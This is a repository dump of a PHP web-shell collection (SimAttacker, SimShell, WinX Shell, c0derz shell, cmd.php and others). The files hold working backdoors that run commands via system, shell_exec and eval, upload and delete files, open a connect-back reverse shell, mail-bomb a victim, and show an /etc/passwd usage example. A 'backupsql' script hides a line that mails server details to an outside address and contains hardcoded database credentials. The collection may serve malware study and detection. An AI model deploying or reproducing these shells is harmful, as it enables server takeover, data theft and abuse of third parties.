"); 47 | echo "Disable functions : "; 48 | if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} 49 | $free = @diskfreespace($dir); 50 | if (!$free) {$free = 0;} 51 | $all = @disk_total_space($dir); 52 | if (!$all) {$all = 0;} 53 | $used = $all-$free; 54 | $used_percent = @round(100/($all/$free),2); 55 | 56 | echo "
\n";
57 | if(empty($file)){
58 | if(empty($_GET['file'])){
59 | if(empty($_POST['file'])){
60 | die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n 
PHP Emperor
62 | xb5@hotmail.com
");
63 | } else {
64 | $file=$_POST['file'];
65 | }
66 | } else {
67 | $file=$_GET['file'];
68 | }
69 | }
70 | 
71 | $temp=tempnam($tymczas, "cx");
72 | 
73 | if(copy("compress.zlib://".$file, $temp)){
74 | $zrodlo = fopen($temp, "r");
75 | $tekst = fread($zrodlo, filesize($temp));
76 | fclose($zrodlo);
77 | echo "--- Start File ".htmlspecialchars($file)."
78 | -------------\n".htmlspecialchars($tekst)."\n--- End File
79 | ".htmlspecialchars($file)." ---------------\n";
80 | unlink($temp);
81 | die("\nFile
82 | ".htmlspecialchars($file)." has been already loaded. PHP Emperor 
83 | ;]");
84 | } else {
85 | die("
Sorry... File
86 | ".htmlspecialchars($file)." dosen't exists or you don't have
87 | access.
");
88 | }
89 | ?>
90 | 
91 | 


--------------------------------------------------------------------------------
/Collection/SimAttacker.php:
--------------------------------------------------------------------------------
  1 |  "" ){
  5 | // path & file name
  6 | $path_parts = pathinfo("$fdownload");
  7 | $entrypath=$path_parts["basename"];
  8 | $name = "$fdownload";
  9 | $fp = fopen($name, 'rb');
 10 | header("Content-Disposition: attachment; filename=$entrypath");
 11 | header("Content-Length: " . filesize($name));
 12 | fpassthru($fp);
 13 | exit;
 14 | }
 15 | ?>
 16 | 	
 17 | 
 18 | 
 19 | 
 20 | 
 21 | 
 22 | SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend 
 23 | 
 28 | 
 29 | 
 30 |  "" ){
 36 |  $fedit=realpath($fedit);
 37 |  $lines = file($fedit);
 38 |  echo "
";
 39 | echo "
 44 | 	
 45 | 	
";
 46 | 	$savefile=$_POST['savefile'];
 47 | 	$filepath=realpath($_POST['filepath']);
 48 | 	if ($savefile <> "") 
 49 | 	{
 50 | 	$fp=fopen("$filepath","w+");
 51 | 	fwrite ($fp,"") ;
 52 | 	fwrite ($fp,$savefile) ;
 53 | 	fclose($fp);
 54 | 	echo "";
 55 | 	}
 56 | exit();
 57 |  }
 58 | ?>
 59 |  "" ){
 63 | $fchmod=realpath($fchmod);
 64 | echo "


 65 | chmod for :$fchmod

 66 | 


 67 | Chmod :

 68 | 

 69 | 
 70 | 
";
 71 | $chmod0=$_POST['chmod0'];
 72 | if ($chmod0 <> ""){
 73 | chmod ($fchmod , $chmod0);
 74 | }else {
 75 | echo "primission Not Allow change Chmod";
 76 | }
 77 | exit();
 78 | }
 79 | ?>
 80 | 	
 81 | 

 82 | 	
 83 | 		
 84 | 			
112 | 			
363 | 		
364 | 		
365 | 			
372 | 		
373 | 	

 85 | 				

 86 | 				

 87 | 				
 88 | 				
 89 | 				
 90 | 				
 91 | 				
 95 | 				File Manager

 96 | 				

 97 | 				
 98 | 				
 99 | 				CMD Shell

100 | 				

101 | 				
102 | 				Fake mail

103 | 				

104 | 				
105 | 				
106 | 				Connect Back

107 | 				

108 | 				
109 | 				
110 | 				About

111 | 				
 
 

113 | 			
121 | ***************************************************************************

122 |  Iranian Hackers : WWW.SIMORGH-EV.COM 

123 |  Programer : Hossein Asgary 

124 |  Note : SimAttacker  Have copyright from simorgh security Group  

125 |  please : If you find bug or problems in program , tell me by : 

126 |  e-mail : admin(at)simorgh-ev(dot)com

127 | Enjoy :) [Only 4 Best Friends ] 

128 | ***************************************************************************

129 | ";
130 | 
131 | echo "OS :". php_uname();
132 | echo "
IP :". 
133 | ($_SERVER['REMOTE_ADDR']);
134 | echo "";
135 | 
136 | 
137 | 			}
138 | 			//************************************************************
139 | 			//cmd-command line
140 | 			$cmd=$_POST['cmd'];
141 | 			if($id=="cmd"){
142 | 		$result=shell_exec("$cmd");
143 | 		echo "
 CMD ExeCute 
" ;
144 | 		echo "

145 | 		

146 | 		

147 | 		
148 | 		
149 | 		
";
150 | 			
151 | 			
152 | 			
153 | 			}
154 | 			
155 | 		//********************************************************	
156 | 		
157 | 		//fake mail = Use victim server 4 DOS - fake mail 
158 | 		if ( $id=="fake-mail"){
159 | 		error_reporting(0);
160 | 		echo "
 Fake Mail- DOS E-mail By Victim Server 
" ;
161 | 		echo "

162 | 		Victim Mail :


163 | 		Number-Mail :


164 | 		Comments:
165 | 		

166 | 		

167 | 		
168 | 		
";
169 | 		//send Storm Mail
170 | 		$to=$_POST['to'];
171 | 		$nom=$_POST['nom'];
172 | 		$Comments=$_POST['Comments'];
173 | 		if ($to <> "" ){
174 | 		for ($i = 0; $i < $nom ; $i++){
175 | 		$from = rand (71,1020000000)."@"."Attacker.com";
176 | 		$subject= md5("$from");
177 |         mail($to,$subject,$Comments,"From:$from");
178 |         echo "$i is ok";
179 |         }      
180 |         echo "";
181 |         }
182 | 		}
183 | 		//********************************************************
184 | 
185 | 			//Connect Back -Firewall Bypass
186 | 			if ($id=="cshell"){
187 | 			echo "
Connect back Shell , bypass Firewalls

188 | 			For user :

189 | 			nc -l -p 1019 

190 | 			

191 | 			


192 | 			Your IP & BindPort:

193 | 			
194 | 			

195 | 			
196 | 			
";
197 | 		 $mip=$_POST['mip'];
198 | 		 $bport=$_POST['bport'];
199 | 		 if ($mip <> "")
200 | 		 {
201 | 		 $fp=fsockopen($mip , $bport , $errno, $errstr);
202 | 		 if (!$fp){
203 | 		       $result = "Error: could not open socket connection";
204 | 		 }
205 | 		 else {
206 | 		 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
207 | 	  while(!feof($fp)){ 
208 |        fputs ($fp," bash # ");
209 |        $result= fgets ($fp, 4096);
210 |       $message=`$result`;
211 |        fputs ($fp,"--> ".$message."\n");
212 |       }
213 |       fclose ($fp);
214 | 		 }
215 | 		 }
216 | 			}
217 | 			
218 | 		//********************************************************
219 | 			//Spy File Manager
220 | 			$homedir=getcwd();
221 | 			$dir=realpath($_GET['dir'])."/";
222 | 			if ($id=="fm"){
223 | 			echo "
 Home: $homedir 
224 |                    
225 |                   

226 |                    Path:
227 |                   
228 |                   
229 |                   
230 |                   

231 |                  
";
232 | 
233 | 			echo "
234 | 
235 | 

236 | 
237 | 
238 | 	
239 | 		
240 | 		
242 | 		
244 | 		
246 | 		
248 | 		
249 | 	";
250 | 		    if (is_dir($dir)){
251 | 		    if ($dh=opendir($dir)){
252 | 		    while (($file = readdir($dh)) !== false) {
253 | 		    $fsize=round(filesize($dir . $file)/1024);
254 | 		
255 | 		    
256 | 	echo " 
257 | 	
258 | 		
267 | 		
277 | 		
289 | 		
302 | 		
310 | 		
311 | 	
312 | 	";
313 | 		      }
314 | 		      closedir($dh);
315 | 		    } 
316 | 		    }
317 | 		    echo "
File / Folder Name
241 | 		Size KByte
243 | 		Download
245 | 		Edit
247 | 		ChmodDelete
";
259 | 		if (is_dir($dir.$file))
260 | 		{
261 | 		echo " $file dir";
262 | 		}
263 | 		else {
264 | 		echo " $file ";
265 | 		}
266 | 		echo "";
268 | 		if (is_file($dir.$file))
269 | 		{
270 | 		echo "$fsize";
271 | 		}
272 | 		else {
273 | 		echo "  ";
274 | 		}
275 | 		echo "
276 | 		";
278 | 		if (is_file($dir.$file)){
279 | 		if (is_readable($dir.$file)){
280 | 		echo "download";
281 | 		}else {
282 | 		echo "No ReadAble";
283 | 		 }
284 | 		}else {
285 | 		echo " ";
286 | 		 }
287 | 		echo "
288 | 		";
290 | 		if (is_file($dir.$file))
291 | 		{
292 | 		if (is_readable($dir.$file)){
293 | 		echo "Edit";
294 | 		}else {
295 | 		echo "No ReadAble";
296 | 		 }
297 | 		}else {
298 | 		echo " ";
299 | 		 }
300 | 		echo "
301 | 		";
303 | 		if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
304 | 		echo "Dont in windows";
305 | 		}
306 | 		else {
307 | 		echo "Chmod";
308 | 		}
309 | 		echo "Delete

318 | 

319 |  
320 |  Send this file: 
321 |  
322 |  
323 |  
324 | 		    
";
325 | 			}
326 | //Upload Files 
327 | $rpath=$_GET['dir'];
328 | if ($rpath <> "") {
329 | $uploadfile = $rpath."/" . $_FILES['userfile']['name'];
330 | print "
";
331 | if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
332 | echo "";
333 | echo "";
334 | }
335 |  }
336 |  //file deleted
337 | $frpath=$_GET['fdelete'];
338 | if ($frpath <> "") {
339 | if (is_dir($frpath)){
340 | $matches = glob($frpath . '/*.*');
341 | if ( is_array ( $matches ) ) {
342 |   foreach ( $matches as $filename) {
343 |   unlink ($filename);
344 |   rmdir("$frpath");
345 | echo "";
346 | echo "";
347 |   }
348 |   }
349 |   }
350 |   else{
351 | echo "";
352 | unlink ("$frpath");
353 | echo "";
354 | exit(0);
355 | 
356 |   }
357 |   
358 | 
359 | }
360 | 			?>
361 | 			
362 | 			

366 | 			


367 | 			Copyright 2004-Simorgh Security

368 | 			Hossein-Asgari

369 | 			
370 | 		
371 | 		www.simorgh-ev.com

374 | 

375 | 
376 | 
377 | 
378 | 


--------------------------------------------------------------------------------
/Collection/SimShell.php:
--------------------------------------------------------------------------------
  1 |  array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '' . "\n";
 97 | ?>
 98 | 
 99 | 
100 |   SimShell - Simorgh Security MGZ
101 |   
102 | 
103 |   
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | 
139 | 
140 | 
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 
148 | 
149 | 
150 | 
151 | 
 Directory:  
152 | 

153 | 
154 | 

155 | 

156 | 
163 | 

164 |   cmd:
166 |    Rows: 
167 |   
168 | 

169 | 

170 |   

171 |   

172 |  Copyright 2004-Simorgh Security

173 |   Make On PhpShell Kernel

174 |   
175 |   www.simorgh-ev.com

176 | 

177 | 

178 | 
179 | 
180 | 
181 | 


--------------------------------------------------------------------------------
/Collection/Simple-Webshell.php:
--------------------------------------------------------------------------------
 1 | 
 6 | 
 7 | 
 8 | 
 9 | 
10 | 
11 |     
12 | 
13 |     
14 | 
15 |     
16 | 
17 |     
18 | 
19 |     Web Shell
20 | 
21 |     
38 | 
39 | 
40 | 
41 | 
42 | 
43 |     

44 | 
45 |         

46 | 	    
PHP Shell

47 |             
 Execute a command 

48 |         

49 | 
50 |         

51 |             

52 |                 
53 |                 
54 |             

55 |             
56 |         

57 | 
58 | 
59 |         

60 |             
 Output 

61 |         

62 |         
63 | 
64 |         

65 | 
66 |         

67 |             
 Output 

68 |         

69 |         
No result.

70 | 
71 |     

72 | 
73 | 
74 | 
75 | 
76 | 


--------------------------------------------------------------------------------
/Collection/Simple_PHP_backdoor.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | ";
 8 |         $cmd = ($_REQUEST['cmd']);
 9 |         system($cmd);
10 |         echo "
"; 11 | die; 12 | } 13 | 14 | ?> 15 | 16 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Collection/Sincap_1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/Sincap_1.0.php -------------------------------------------------------------------------------- /Collection/Uploader.php: -------------------------------------------------------------------------------- 1 |
2 | 3 | Send this file: 4 | 5 |
6 | 9 | 10 | -------------------------------------------------------------------------------- /Collection/WinX_Shell.php: -------------------------------------------------------------------------------- 1 | -:[GreenwooD]:- WinX Shell 2 | 3 | "; 32 | print ""; 33 | print "You:" ; 34 | print " ".$_SERVER['REMOTE_ADDR']." [".$host."] " ; 35 | print ""; 36 | print ""; 37 | print "Version OS:" ; 38 | print " $veros "; 39 | print ""; 40 | print ""; 41 | print "Server:"; 42 | print "".$_SERVER['SERVER_SIGNATURE'].""; 43 | print ""; 44 | print ""; 45 | print "Win Dir:"; 46 | print " $windir "; 47 | print ""; 48 | print ""; 49 | print "
"; 50 | 51 | //------- [netstat -an] and [ipconfig] and [tasklist] ------------ 52 | print "
"; 53 | print ""; 54 | print "   "; 55 | print ""; 56 | print "   "; 57 | print ""; 58 | print "
"; 59 | //------------------------------- 60 | 61 | 62 | //------------------------------- 63 | 64 | print ""; 67 | print "
"; 68 | 69 | //------------------------------- 70 | 71 | print "
"; 72 | print "CMD: "; 73 | print "
"; 74 | print ""; 75 | print " "; 76 | print "
"; 77 | 78 | //------------------------------- 79 | 80 | print "
"; 81 | print "Upload:"; 82 | print "
"; 83 | print ""; 84 | print "File: "; 85 | print " Filename on server: "; 86 | print" "; 87 | print"
"; 88 | 89 | ?> 90 | 91 | 92 | 100 | 101 | 102 |
Created by -:[GreenwooD]:-
103 | -------------------------------------------------------------------------------- /Collection/Worse_Linux_Shell.php: -------------------------------------------------------------------------------- 1 | body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}"; 6 | print "

#worst @dal.net

"; 7 | print "

You have been hack By Shany with Love To #worst.

"; 8 | print "

Watch Your system Shany was here.

"; 9 | print "

Linux Shells

"; 10 | print "
"; 11 | 12 | $currentWD = str_replace("\\\\","\\",$_POST['_cwd']); 13 | $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']); 14 | 15 | $UName = `uname -a`; 16 | $SCWD = `pwd`; 17 | $UserID = `id`; 18 | 19 | if( $currentWD == "" ) { 20 | $currentWD = $SCWD; 21 | } 22 | 23 | print ""; 24 | print ""; 25 | print ""; 26 | print ""; 27 | print ""; 28 | print "
We are:".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
Server is:".$_SERVER['SERVER_SIGNATURE']."
System type:$UName
Our permissions:$UserID
"; 29 | 30 | print "
"; 31 | 32 | if( $_POST['_act'] == "List files!" ) { 33 | $currentCMD = "ls -la"; 34 | } 35 | 36 | print "
"; 37 | 38 | print ""; 39 | print ""; 40 | 41 | print ""; 42 | print ""; 43 | 44 | print ""; 45 | print ""; 46 | 47 | print "
Execute command:
Change directory:
Upload file:
"; 48 | 49 | $currentCMD = str_replace("\\\"","\"",$currentCMD); 50 | $currentCMD = str_replace("\\\'","\'",$currentCMD); 51 | 52 | if( $_POST['_act'] == "Upload!" ) { 53 | if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) { 54 | print "
Error while uploading file!
"; 55 | } else { 56 | print "
";
57 |         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
58 |         print "
File uploaded successfully!
"; 59 | } 60 | } else { 61 | print "\n\n\n
\n";
62 |     $currentCMD = "cd ".$currentWD.";".$currentCMD;
63 |     system($currentCMD);
64 |     print "\n
\n\n\n
Command completed
"; 65 | } 66 | 67 | exit; 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /Collection/ZyklonShell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 |

Not Found

6 | The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.

7 | 8 | -------------------------------------------------------------------------------- /Collection/aZRaiLPhp_v1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/aZRaiLPhp_v1.0.php -------------------------------------------------------------------------------- /Collection/accept_language.php: -------------------------------------------------------------------------------- 1 | by q1w2e3r4'; ?> 2 | -------------------------------------------------------------------------------- /Collection/backupsql.php: -------------------------------------------------------------------------------- 1 | 10 | * @version 0.2 11 | * @date 18/08/2004 12 | * @package Backup Server 13 | * Upgraded Ver 2.0 (sending sql backup as attachment 14 | * as email attachment, or send to a remote ftp server by 15 | * @co-authors Cool Surfer and 16 | * Neagu Mihai 17 | */ 18 | 19 | set_time_limit(0); 20 | $date = date("mdy-hia"); 21 | $dbserver = "localhost"; 22 | $dbuser = "vhacker_robot"; 23 | $dbpass = "mp2811987"; 24 | $dbname = "tvhacker_vbb3"; 25 | $file = "N-Cool-$date.sql.gz"; 26 | $gzip = TRUE; 27 | $silent = TRUE; 28 | 29 | function write($contents) { 30 | if ($GLOBALS['gzip']) { 31 | gzwrite($GLOBALS['fp'], $contents); 32 | } else { 33 | fwrite($GLOBALS['fp'], $contents); 34 | } 35 | } 36 | 37 | mysql_connect ($dbserver, $dbuser, $dbpass); 38 | mysql_select_db($dbname); 39 | 40 | if ($gzip) { 41 | $fp = gzopen($file, "w"); 42 | } else { 43 | $fp = fopen($file, "w"); 44 | } 45 | 46 | $tables = mysql_query ("SHOW TABLES"); 47 | while ($i = mysql_fetch_array($tables)) { 48 | $i = $i['Tables_in_'.$dbname]; 49 | 50 | if (!$silent) { 51 | echo "Backing up table ".$i."\n"; 52 | } 53 | 54 | // Create DB code 55 | $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); 56 | 57 | write($create['Create Table'].";\n\n"); 58 | 59 | // DB Table content itself 60 | $sql = mysql_query ("SELECT * FROM ".$i); 61 | if (mysql_num_rows($sql)) { 62 | while ($row = mysql_fetch_row($sql)) { 63 | foreach ($row as $j => $k) { 64 | $row[$j] = "'".mysql_escape_string($k)."'"; 65 | } 66 | 67 | write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); 68 | } 69 | } 70 | } 71 | 72 | $gzip ? gzclose($fp) : fclose ($fp); 73 | 74 | // Optional Options You May Optionally Configure 75 | 76 | $use_gzip = "yes"; // Set to No if you don't want the files sent in .gz format 77 | $remove_sql_file = "no"; // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended. 78 | $remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no" 79 | 80 | // Configure the path that this script resides on your server. 81 | 82 | $savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash! 83 | 84 | $send_email = "yes"; /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */ 85 | $to = "lehungtk@gmail.com"; // Who to send the emails to, enter ur correct id. 86 | $from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may change it. 87 | 88 | $senddate = date("j F Y"); 89 | 90 | $subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent. 91 | $message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message. 92 | 93 | $use_ftp = ""; // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines 94 | $ftp_server = "localhost"; // FTP hostname 95 | $ftp_user_name = "ftp_username"; // FTP username 96 | $ftp_user_pass = "ftp_password"; // FTP password 97 | $ftp_path = "/"; // This is the path to upload on your ftp server! 98 | 99 | // Do not Modify below this line! It will void your warranty :-D! 100 | 101 | $date = date("mdy-hia"); 102 | $filename = "$savepath/$dbname-$date.sql"; 103 | 104 | if($use_gzip=="yes"){ 105 | $filename2 = $file; 106 | } else { 107 | $filename2 = "$savepath/$dbname-$date.sql"; 108 | } 109 | 110 | 111 | if($send_email == "yes" ){ 112 | $fileatt_type = filetype($filename2); 113 | $fileatt_name = "".$dbname."-".$date."_sql.tar.gz"; 114 | 115 | $headers = "From: $from"; 116 | 117 | // Read the file to be attached ('rb' = read binary) 118 | echo "Openning archive for attaching:".$filename2; 119 | $file = fopen($filename2,'rb'); 120 | $data = fread($file,filesize($filename2)); 121 | fclose($file); 122 | 123 | // Generate a boundary string 124 | $semi_rand = md5(time()); 125 | $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x"; 126 | 127 | // Add the headers for a file attachment 128 | $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); 129 | 130 | // Add a multipart boundary above the plain message 131 | $message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" . 132 | $message . "\n\n"; 133 | 134 | // Base64 encode the file data 135 | $data = chunk_split(base64_encode($data)); 136 | 137 | // Add file attachment to the message 138 | echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|
"; 139 | $message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" . 140 | $data . "\n\n" ."--{$mime_boundary}--\n"; 141 | //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" . 142 | // $data . "\n\n" ."--{$mime_boundary}--\n"; 143 | 144 | 145 | // Send the message 146 | $ok = @mail($to, $subject, $message, $headers); 147 | if ($ok) { 148 | echo "

Database backup created and sent! File name $filename2

149 | Idea Conceived By coolsurfer@gmail.com 150 | Programmer email: neagumihai@hotmail.com

151 | This is our first humble effort, pl report bugs, if U find any...

152 | Email me at <>coolsurfer@gmail.com nJoY!! :) 153 |

"; 154 | 155 | } else { 156 | echo "

Mail could not be sent. Sorry!

"; 157 | } 158 | } 159 | 160 | if($use_ftp == "yes"){ 161 | $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2"; 162 | shell_exec($ftpconnect); 163 | echo "

$filename2 Was created and uploaded to your FTP server!

"; 164 | 165 | } 166 | 167 | if($remove_gzip_file=="yes"){ 168 | exec("rm -r -f $filename2"); 169 | } 170 | ?> -------------------------------------------------------------------------------- /Collection/c0derz_shell.php: -------------------------------------------------------------------------------- 1 |

Error 401

Unauthorized access!

"); 36 | } 37 | if($achtung) 38 | error_reporting(E_ALL&~E_NOTICE); 39 | else 40 | error_reporting(0); 41 | //--------------------- 42 | 43 | //get page generating time 44 | if (!function_exists("get_micro_time")) { 45 | function get_micro_time() { 46 | list($usec, $sec) = explode(" ", microtime()); 47 | return ((float)$usec + (float)$sec); 48 | } 49 | } 50 | define("start_time",get_micro_time()); 51 | $cshver=".::[csh]::. v. 0.1.1 release"; 52 | //------------------------------- 53 | 54 | //normalize text encoding 55 | function decode($buffer){ 56 | return convert_cyr_string ($buffer, 'd', 'w'); 57 | } 58 | //--------------------------------- 59 | 60 | ?> 61 | 62 | 63 | 64 | 65 | 66 | .:[csh]:.| [".get_current_user()."@".$SERVER_NAME."]"; 68 | ?> 69 | 70 | 94 | 95 | 96 |
97 | 98 |
99 |
100 | 101 | 142 | 143 |
102 | 103 | 104 | 105 | 106 | 114 | 115 |
107 | 108 | 109 | Server info:
"; 111 | ?> 112 | 113 |
116 | 117 | ".$SERVER_NAME."
"; 120 | echo "Server IP adress:".$server_ip=gethostbyname($SERVER_NAME)."
"; 121 | echo (($safe_mode)?("Safe Mode: ON
"): 122 | ("Safe Mode: OFF
")); 123 | echo "OS: "; 124 | if (empty($uname)){ 125 | echo (php_uname()."
"); 126 | }else 127 | echo $uname."
"; 128 | echo 'User: ' .get_current_user() . '
'; 129 | echo "HTTP Server: ".$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']."
"; 130 | echo ("PHP: ".phpversion()."
"); 131 | echo ("MySQL: "); 132 | if($mysql_stat=function_exists('mysql_connect')){ 133 | echo "ON "; 134 | } 135 | else { 136 | echo "OFF
"; 137 | } 138 | //--------------------------- 139 | ?> 140 | 141 |
144 | 145 | 146 |
147 |
.::[Shell functions]::.
 148 | 149 | 150 | 151 | 155 | 156 |
152 | 153 | " title="./$shell">./ $shell
154 |
157 | 158 | 159 | 163 | 164 |
160 | 161 | " title="PHP code execution">./php execution
162 |
165 | 166 | 167 | 171 | 172 |
168 | 169 | " title="Upload file to server">./ upload file
170 |
173 |
174 |
175 |
176 |
177 |
178 |
179 | 180 |
181 |
182 | 183 | 184 | 188 | "; 201 | $head_text="Shell:"; 202 | chdir($dir); 203 | 204 | function execute($com) 205 | { 206 | 207 | if (!empty($com)) 208 | { 209 | if(function_exists('exec')) 210 | { 211 | exec($com,$arr); 212 | echo implode(' 213 | ',$arr); 214 | } 215 | elseif(function_exists('shell_exec')) 216 | { 217 | echo shell_exec($com); 218 | } 219 | elseif(function_exists('system')) 220 | { 221 | echo system($com); 222 | } 223 | elseif(function_exists('passthru')) 224 | { 225 | echo passthru($com); 226 | } 227 | } 228 | 229 | } 230 | if ($cmd){ 231 | 232 | if($sertype == "winda"){ 233 | ob_start(); 234 | execute($cmd); 235 | $buffer = ""; 236 | $buffer = ob_get_contents(); 237 | ob_end_clean(); 238 | } 239 | else{ 240 | ob_start(); 241 | echo decode(execute($cmd)); 242 | $buffer = ""; 243 | $buffer = ob_get_contents(); 244 | ob_end_clean(); 245 | } 246 | if (trim($buffer)){ 247 | echo "
185 | 186 | 187 |
189 | 190 |
191 | [".getcwd()."]
Executed command: [$cmd]
"; 250 | } 251 | } 252 | echo "
253 |
254 |
[".get_current_user()."@".$SERVER_NAME."]:
255 |
Current directory: 258 | \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
"; 259 | break; 260 | case "phpcode": 261 | $head_text="PHP code execution:"; 262 | echo "
PHP code:


263 | \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
"; 264 | echo "
Results of PHP execution:
"; 265 | @eval(stripslashes($_POST['phpcode'])); 266 | echo "
"; 267 | break; 268 | case "upload": 269 | echo"
270 | 271 | 272 |
273 | 274 | 275 | 276 | 277 | 278 | 279 | 280 |
File:
Path:
"; 281 | if (isset($_POST['path'])){ 282 | $uploadfile = $_POST['path'].$_FILES['file']['name']; 283 | if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} 284 | echo"
"; 285 | if (copy($_FILES['file']['tmp_name'], $uploadfile)) { 286 | echo "File sucessfuly uploaded in to directory: [$uploadfile]
"; 287 | echo "Name: [".$_FILES['file']['name']. "]
"; 288 | echo "Size: [" .$_FILES['file']['size']. "] Bytes
"; 289 | } else { 290 | print "Couldn't to upload file. Information:
"; 291 | print_r($_FILES); 292 | } 293 | echo"
"; 294 | } 295 | break; 296 | } 297 | ?> 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | 306 | 307 | 308 |
309 | 310 | 311 | 312 | 313 |
314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 331 | 332 |
323 | 324 |
325 | 326 | [".round(get_micro_time()-start_time,4). "] seconds.]=-"; 328 | ?> 329 | 330 |
333 | 334 | -------------------------------------------------------------------------------- /Collection/cgitelnet.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/cgitelnet.php -------------------------------------------------------------------------------- /Collection/cmd.php: -------------------------------------------------------------------------------- 1 | "; 4 | $cmd = ($_REQUEST['cmd']); 5 | system($cmd); 6 | echo ""; 7 | die; 8 | } 9 | ?> 10 | -------------------------------------------------------------------------------- /Collection/configkillerionkros.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | --==[[Configuration File Killer By Ion Kros]]==-- 9 | 10 | 11 | 102 | '; ?> 121 | 122 | 123 | 128 | 129 | 130 | 131 | 132 | --==[[ Configuration File Killer By Team IndiShell ]]==--
133 | 134 | 137 | 138 | #############################################################################################################################################################
-==[[Greetz to]]==--
Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell
